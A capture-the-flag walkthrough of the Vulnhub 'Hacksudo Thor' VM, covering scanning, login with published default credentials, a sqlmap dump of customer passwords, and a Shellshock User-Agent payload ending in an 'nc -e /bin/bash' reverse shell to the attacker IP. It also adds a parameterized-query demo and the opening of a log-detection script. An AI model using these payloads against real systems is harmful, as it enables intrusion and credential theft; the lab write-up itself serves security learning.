Vulnhub: Hacksudo Thor, a detailed walkthrough

Hacksudo Thor

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:c1:4a:6a      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.212  08:00:27:d0:de:1d      1      60  PCS Systemtechnik GmbH    

The netdiscover tool that ships with Kali Linux identifies the target host's IP address as 192.168.56.212.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.212 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-06 08:51 EST
Nmap scan report for 192.168.56.212
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA)
|   256 349a57607d6670d5b5ff4796e0362375 (ECDSA)
|_  256 ae7deefe1dbc994d54453d6116f86c87 (ED25519)
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:D0:DE:1D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.68 seconds

The Nmap results show two open ports on the target, 22 (SSH) and 80 (HTTP), plus port 21 in the filtered state. Could port knocking be involved?

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ ftp 192.168.56.212
ftp: Can't connect to `192.168.56.212:21': Connection refused
ftp: Can't connect to `192.168.56.212:ftp'
ftp> quit

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ nikto -h http://192.168.56.212
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.212
+ Target Hostname:    192.168.56.212
+ Target Port:        80
+ Start Time:         2023-01-06 08:55:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-01-06 08:56:44 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.212
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/06 08:57:24 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.212/fonts/]
/server-status        (Status: 403) [Size: 279]
Progress: 218003 / 220561 (98.84%)===============================================================
2023/01/06 08:57:36 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.js,.sh,.html 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.212
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              sh,html,php,txt,js
[+] Timeout:                 10s
===============================================================
2023/01/06 08:57:51 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 5357]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/contact.php          (Status: 200) [Size: 4164]
/news.php             (Status: 200) [Size: 8062]
/home.php             (Status: 200) [Size: 5345]
/header.php           (Status: 200) [Size: 472]
/connect.php          (Status: 200) [Size: 0]
/navbar.php           (Status: 200) [Size: 1515]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.212/fonts/]
/transactions.php     (Status: 302) [Size: 8163] [--> home.php]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/customer_profile.php (Status: 302) [Size: 7274] [--> home.php]
Progress: 1321732 / 1323366 (99.88%)===============================================================
2023/01/06 08:59:19 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ dirb http://192.168.56.212

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jan  6 09:01:08 2023
URL_BASE: http://192.168.56.212/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.212/ ----
+ http://192.168.56.212/cgi-bin/ (CODE:403|SIZE:279)                                                                        
==> DIRECTORY: http://192.168.56.212/fonts/                                                                                 
==> DIRECTORY: http://192.168.56.212/images/                                                                                
+ http://192.168.56.212/index.php (CODE:200|SIZE:5357)                                                                      
+ http://192.168.56.212/server-status (CODE:403|SIZE:279)                                                                   
                                                                                                                            
---- Entering directory: http://192.168.56.212/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                            
---- Entering directory: http://192.168.56.212/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Fri Jan  6 09:01:10 2023
DOWNLOADED: 4612 - FOUND: 3

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.txt,.js,.sh,.html 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.212
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,txt,js,sh
[+] Timeout:                 10s
===============================================================
2023/01/06 09:04:02 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/contact.php          (Status: 200) [Size: 4164]
/news.php             (Status: 200) [Size: 8062]
/home.php             (Status: 200) [Size: 5345]
/index.php            (Status: 200) [Size: 5357]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.212/fonts/]
/header.php           (Status: 200) [Size: 472]
/connect.php          (Status: 200) [Size: 0]
/server-status        (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/navbar.php           (Status: 200) [Size: 1515]
/transactions.php     (Status: 302) [Size: 8163] [--> home.php]
/admin_login.php      (Status: 200) [Size: 1511]
Progress: 135383 / 373710 (36.23%)[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:10 [!] parse "http://192.168.56.212/besalu\t.html": net/url: invalid control character in URL
Progress: 142599 / 373710 (38.16%)[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/06 09:04:11 [!] parse "http://192.168.56.212/error\x1f_log.html": net/url: invalid control character in URL
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 5357]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 373435 / 373710 (99.93%)===============================================================
2023/01/06 09:04:28 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.txt,.js,.sh,.html 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.212
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,js,sh,html
[+] Timeout:                 10s
===============================================================
2023/01/06 09:05:30 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htaccess.js         (Status: 403) [Size: 279]
/.htaccess.sh         (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.js         (Status: 403) [Size: 279]
/.htpasswd.sh         (Status: 403) [Size: 279]
/admin_login.php      (Status: 200) [Size: 1511]
/cgi-bin/             (Status: 403) [Size: 279]
/cgi-bin/.php         (Status: 403) [Size: 279]
/cgi-bin/.html        (Status: 403) [Size: 279]
/connect.php          (Status: 200) [Size: 0]
/contact.php          (Status: 200) [Size: 4164]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.212/fonts/]
/header.php           (Status: 200) [Size: 472]
/home.php             (Status: 200) [Size: 5345]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/index.php            (Status: 200) [Size: 5357]
/navbar.php           (Status: 200) [Size: 1515]
/news.php             (Status: 200) [Size: 8062]
/server-status        (Status: 403) [Size: 279]
/transactions.php     (Status: 302) [Size: 8163] [--> home.php]
Progress: 114447 / 122862 (93.15%)===============================================================
2023/01/06 09:05:37 Finished
===============================================================

/admin_login.php was found.

Intercept the login request with Burp Suite, save it as a request file, and scan it with sqlmap.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -r req.txt --level=3

No SQL injection vulnerability was found, and manually trying various login-bypass payloads failed as well.

So far neither directory and file scanning nor SQL injection scanning has yielded much, apart from identifying the admin login entry point.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ dirsearch  -u http://192.168.56.212 -e *

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                      
                                                                                                                             
Extensions: nmap_full_scan | HTTP method: GET | Threads: 30 | Wordlist size: 9009

Output File: /home/kali/.dirsearch/reports/192.168.56.212/_23-01-06_09-21-54.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-01-06_09-21-54.log

Target: http://192.168.56.212/

[09:21:54] Starting: 
[09:21:55] 403 -  279B  - /.ht_wsr.txt                                     
[09:21:55] 403 -  279B  - /.htaccess.bak1                                  
[09:21:55] 403 -  279B  - /.htaccess_extra
[09:21:55] 403 -  279B  - /.htaccess_orig
[09:21:55] 403 -  279B  - /.htaccess.sample
[09:21:55] 403 -  279B  - /.htaccess.save
[09:21:55] 403 -  279B  - /.htaccess.orig
[09:21:55] 403 -  279B  - /.htaccessOLD
[09:21:55] 403 -  279B  - /.htaccessBAK
[09:21:55] 403 -  279B  - /.html
[09:21:55] 403 -  279B  - /.htaccess_sc                                    
[09:21:55] 403 -  279B  - /.htm
[09:21:55] 403 -  279B  - /.htaccessOLD2
[09:21:55] 403 -  279B  - /.httr-oauth
[09:21:55] 403 -  279B  - /.htpasswds
[09:21:55] 403 -  279B  - /.htpasswd_test
[09:21:55] 403 -  279B  - /.php                                            
[09:21:57] 200 -    4KB - /README.md                                        
[09:22:02] 403 -  279B  - /cgi-bin/                                         
[09:22:05] 301 -  316B  - /fonts  ->  http://192.168.56.212/fonts/          
[09:22:06] 200 -    5KB - /home.php                                         
[09:22:06] 301 -  317B  - /images  ->  http://192.168.56.212/images/        
[09:22:06] 200 -    4KB - /images/
[09:22:06] 200 -    5KB - /index.php                                        
[09:22:06] 200 -    5KB - /index.php/login/                                 
[09:22:12] 403 -  279B  - /server-status                                    
[09:22:12] 403 -  279B  - /server-status/                                   
                                                                             
Task Completed

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ curl http://192.168.56.212/README.md 
## Disclaimer
<b><i>This project should not be modified in any way and used anywhere else without my permission.</b></i>

If you use this project for phishing purposes after modifying the source code / or by any other means, remember that the original project has nothing to do with phishing or any other malicious purpose. Any loss of data or unauthorized access which happened because of such phishing kits would not be my responsibility as that is not my original code. Strict legal action would be taken if someone is found modifying it and using it for any unethical purpose.

# Online Banking System
A web based banking system with all essential features and security accompanied by a beautiful and simple website. The website is designed in accordance with google material design and resposive web design guidelines to ensure a seamless experience between devices.

A fictional name of "Dolphin Bank" has been used only for representative purposes.

## Built with
<b>HTML5, CSS, JavaScript</b> & <b>jQuery</b> used for front-end design.


<b>PHP7 & MySQL</b> used for back-end design.


<b>Oracle MySQL</b> has been used to create and host the database for the
internet banking website.


Other than the languages/tools mentioned above <b>no</b> other/external
libraries and/or web-page templates have been used, everything has been
coded from ground-up straight from scratch.

## How to build/use
Setup an environment which supports web development like <b>LAMP</b> on <b>Linux</b> systems OR install <b>WampServer/XAMPP</b> or anything similar on <b>Windows</b>.

Copy the folder [net-banking](https://github.com/zakee94/online-banking-system/tree/master/net-banking) or the files in it to the location of the localhost. For example "/var/www/html", the loaction of localhost in Ubuntu.

Import the [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql) database into your MySQL setup.

Edit the file [connect.php](https://github.com/zakee94/online-banking-system/blob/master/net-banking/connect.php) and give proper username and password of your MySQL setup.

Open a browser and test wether the setup works or not by visiting the home page. Type "localhost/home.php" as the URL in the browser to visit the home page.

All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql).

However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".

Some useful links to help in proper setup :
* [Installing LAMP](https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-14-04)
* [WampServer](http://www.wampserver.com/en/)
* [Importing database in MySQL](https://www.digitalocean.com/community/tutorials/how-to-import-and-export-databases-and-reset-a-root-password-in-mysql)

## Details about the project
An exhaustive list of features, documentation, design hierarchy, details about the web pages, database, design characterstics/features and a lot more can be found [here](https://drive.google.com/open?id=1Px2shjcmyLUv7-u5wp93HvKT_zvw-Pmk).

The ER Diagram can also be found on the link given above or can be viewed [here](https://drive.google.com/open?id=1Tn2fBR9IjLP8dlv6svrc4aEvryrYcI3G).

## Description of the various folders
- <b>/net-banking :</b> Contains the source code of the website
    - <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website
    - <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website

## Screenshots (more can be found [here](https://drive.google.com/open?id=1bLLNyEiVGoWgHDfOehGooYSAZUNtj85F))
![](https://drive.google.com/uc?id=1XAImOcjlkVbGv3OVcLtfZJKIG4jIh9D_)

![](https://drive.google.com/uc?id=1wPAlZ-QhjwOJMP4L7Bi7kEGbmcLS3Qaa)

## Authors
* [zakee94](https://github.com/zakee94/)

Visiting the author's GitHub

The author's GitHub has an online banking project whose description contains this note:

However some important usernames and passwords are provided below :

    Username of admin is "admin" & password is "password123".
    Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".

These should be the administrator's username and password, and indeed they log in successfully.

Browsing the admin back-end pages turns up no file-upload entry point, but one place looks like it may have a SQL injection vulnerability:

http://192.168.56.212/edit_customer.php?cust_id=1

Testing with sqlmap confirms that a SQL injection vulnerability does exist. First enumerate the databases, then select the hacksudo database and list its tables; by comparison with the source code on GitHub, the next step is to dump the usernames and passwords from the customer table.

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -u http://192.168.56.212/edit_customer.php?cust_id=1 --cookie='PHPSESSID="5ag0i47uggl4mv8l32cq602j8h"' --level=3
        ___
       __H__                                                                                                                 
 ___ ___[,]_____ ___ ___  {1.6.12#stable}                                                                                    
|_ -| . [(]     | .'| . |                                                                                                    
|___|_  [)]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org       
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -u http://192.168.56.212/edit_customer.php?cust_id=1 --cookie='PHPSESSID="5ag0i47uggl4mv8l32cq602j8h"' --level=3 --dbs
        ___
       __H__                                                                                                                 
 ___ ___[)]_____ ___ ___  {1.6.12#stable}                                                                                    
|_ -| . ["]     | .'| . |                                                                                                    
|___|_  [(]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org             
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -u http://192.168.56.212/edit_customer.php?cust_id=1 --cookie='PHPSESSID="5ag0i47uggl4mv8l32cq602j8h"' --level=3 -D hacksudo --tables

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ sqlmap -u http://192.168.56.212/edit_customer.php?cust_id=1 --cookie='PHPSESSID="5ag0i47uggl4mv8l32cq602j8h"' --level=3 -D hacksudo -T customer -C uname,pwd --dump
        ___
       __H__                                                                                                                 
 ___ ___[(]_____ ___ ___  {1.6.12#stable}                                                                                    
|_ -| . [)]     | .'| . |                                                                                                    
|___|_  [(]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:59:13 /2023-01-06/

[09:59:13] [INFO] resuming back-end DBMS 'mysql' 
[09:59:13] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.56.212:80/home.php'. Do you want to follow? [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cust_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cust_id=1 AND (SELECT 9791 FROM (SELECT(SLEEP(5)))dUkE)
---
[09:59:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:59:17] [INFO] fetching entries of column(s) 'pwd,uname' for table 'customer' in database 'hacksudo'
[09:59:17] [INFO] fetching number of column(s) 'pwd,uname' entries for table 'customer' in database 'hacksudo'
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[09:59:28] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
4
[09:59:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[09:59:44] [INFO] adjusting time delay to 1 second due to good response times
nafees123
[10:00:03] [INFO] retrieved: zakee94
[10:00:25] [INFO] retrieved: salman123
[10:00:49] [INFO] retrieved: salman
[10:01:06] [INFO] retrieved: snow123
[10:01:29] [INFO] retrieved: jon
[10:01:41] [INFO] retrieved: tushar123
[10:02:07] [INFO] retrieved: tushar
Database: hacksudo
Table: customer
[4 entries]
+---------+-----------+
| uname   | pwd       |
+---------+-----------+
| zakee94 | nafees123 |
| salman  | salman123 |
| jon     | snow123   |
| tushar  | tushar123 |
+---------+-----------+

[10:02:26] [INFO] table 'hacksudo.customer' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.212/dump/hacksudo/customer.csv'                                                                                                          
[10:02:26] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.212'

[*] ending @ 10:02:26 /2023-01-06/
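The time-based blind injection sqlmap found in edit_customer.php is what you get when cust_id is concatenated straight into the query. The Python below is an added example, not code from this write-up or from the Dolphin Bank project: it uses sqlite3 as a stand-in for MySQL (so SLEEP() is unavailable and boolean true/false probes stand in for the timing probe), and the table and column names are assumed from the sqlmap output above. It puts the vulnerable pattern next to the parameterized form.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the hacksudo.customer table (sqlite3, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customer (cust_id INTEGER PRIMARY KEY, uname TEXT, pwd TEXT)"
    )
    # Usernames follow the page's dump; passwords are placeholders.
    conn.executemany(
        "INSERT INTO customer VALUES (?, ?, ?)",
        [
            (1, "zakee94", "placeholder"),
            (2, "salman", "placeholder"),
            (3, "jon", "placeholder"),
            (4, "tushar", "placeholder"),
        ],
    )
    return conn


def edit_customer_vulnerable(conn, cust_id):
    """String-built query: whatever arrives in cust_id is parsed as SQL syntax."""
    sql = "SELECT cust_id, uname FROM customer WHERE cust_id=" + cust_id
    return conn.execute(sql).fetchall()


def edit_customer_bound_only(conn, cust_id):
    """Binding alone: the value travels as data, so injected syntax is inert."""
    return conn.execute(
        "SELECT cust_id, uname FROM customer WHERE cust_id=?", (cust_id,)
    ).fetchall()


def edit_customer_hardened(conn, cust_id):
    """Validate the type first, then bind; malformed ids are rejected outright."""
    if not cust_id.isdigit():
        raise ValueError("cust_id must be a positive integer")
    return conn.execute(
        "SELECT cust_id, uname FROM customer WHERE cust_id=?", (int(cust_id),)
    ).fetchall()


def demo():
    """Row counts for each variant; blind_true/blind_false is the one bit per
    request that a blind injection leaks, and what sqlmap's SLEEP() probe
    measures by timing instead."""
    conn = build_db()
    results = {
        "normal": len(edit_customer_vulnerable(conn, "1")),
        "blind_true": len(edit_customer_vulnerable(conn, "1 AND 1=1")),
        "blind_false": len(edit_customer_vulnerable(conn, "1 AND 1=2")),
        "tautology": len(edit_customer_vulnerable(conn, "1 OR 1=1")),
        "bound_normal": len(edit_customer_bound_only(conn, "1")),
        "bound_tautology": len(edit_customer_bound_only(conn, "1 OR 1=1")),
        "hardened_normal": len(edit_customer_hardened(conn, "1")),
    }
    try:
        edit_customer_hardened(conn, "1 OR 1=1")
        results["hardened_rejects"] = False
    except ValueError:
        results["hardened_rejects"] = True
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>16}: {value}")
```

The bound-only variant already closes the injection (the text "1 OR 1=1" is compared to the integer column and matches nothing); adding the type check on top turns a silent empty result into a logged error, which is the version a defender wants because it makes probing visible.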

                                       

Trying these usernames and passwords against SSH fails for every one of them, so this direction looks wrong.

A source-code comment in news.php reads:

<!-- cgi-bin ---!> 

There may be executable files under that directory.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ dirsearch -u http://192.168.56.212/cgi-bin/ -f -e cgi,sh

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                      
                                                                                                                             
Extensions: cgi, sh | HTTP method: GET | Threads: 30 | Wordlist size: 16514

Output File: /home/kali/.dirsearch/reports/192.168.56.212/-cgi-bin-_23-01-06_10-11-25.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-01-06_10-11-25.log

Target: http://192.168.56.212/cgi-bin/

[10:11:25] Starting: 
[10:11:26] 403 -  279B  - /cgi-bin/.ht_wsr.txt                             
[10:11:26] 403 -  279B  - /cgi-bin/.htpasswd_test                          
[10:11:26] 403 -  279B  - /cgi-bin/.htaccess.bak1
[10:11:26] 403 -  279B  - /cgi-bin/.htaccess.sample
[10:11:26] 403 -  279B  - /cgi-bin/.htaccess.orig
[10:11:26] 403 -  279B  - /cgi-bin/.htaccess.save
[10:11:26] 403 -  279B  - /cgi-bin/.htaccess_orig
[10:11:26] 403 -  279B  - /cgi-bin/.htaccess_sc
[10:11:26] 403 -  279B  - /cgi-bin/.htaccess_extra
[10:11:26] 403 -  279B  - /cgi-bin/.htaccessBAK
[10:11:26] 403 -  279B  - /cgi-bin/.htaccessOLD2
[10:11:26] 403 -  279B  - /cgi-bin/.htaccessOLD
[10:11:26] 403 -  279B  - /cgi-bin/.html
[10:11:26] 403 -  279B  - /cgi-bin/.htm                                    
[10:11:26] 403 -  279B  - /cgi-bin/.htpasswds
[10:11:26] 403 -  279B  - /cgi-bin/.httr-oauth                             
[10:11:26] 403 -  279B  - /cgi-bin/.php                                    
[10:11:38] 500 -  612B  - /cgi-bin/backup.cgi                               
[10:12:01] 500 -  612B  - /cgi-bin/shell.sh                                 
                                                

Scan backup.cgi for the Shellshock vulnerability.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.212
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-06 10:12 EST
Nmap scan report for 192.168.56.212
Host is up (0.00043s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     Exploit results:
|       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|   <html><head>
|   <title>500 Internal Server Error</title>
|   </head><body>
|   <h1>Internal Server Error</h1>
|   <p>The server encountered an internal error or
|   misconfiguration and was unable to complete
|   your request.</p>
|   <p>Please contact the server administrator at 
|    webmaster@localhost to inform them of the time this error occurred,
|    and the actions you performed just before this error.</p>
|   <p>More information about this error may be available
|   in the server error log.</p>
|   <hr>
|   <address>Apache/2.4.38 (Debian) Server at 192.168.56.212 Port 80</address>
|   </body></html>
|   
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_      http://seclists.org/oss-sec/2014/q3/685
|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" \http://192.168.56.212/cgi-bin/backup.cgi

uid=33(www-data) gid=33(www-data) groups=33(www-data)


Use the following payload to get a reverse shell.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.56.206 5555'" \http://192.168.56.212/cgi-bin/backup.cgi
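From the defender's side, both the time-based injection and the Shellshock request leave recognisable traces in the Apache access log. The Python script below is an added example, not code from this write-up: it parses constructed combined-format log lines (the client and target IPs, paths, sqlmap payload and User-Agent string mirror those shown on this page) and flags three things: a function definition in a header (CVE-2014-6271), a timing function in a query string, and the default User-Agent of a scanning tool.

```python
import re
from collections import namedtuple
from urllib.parse import unquote_plus

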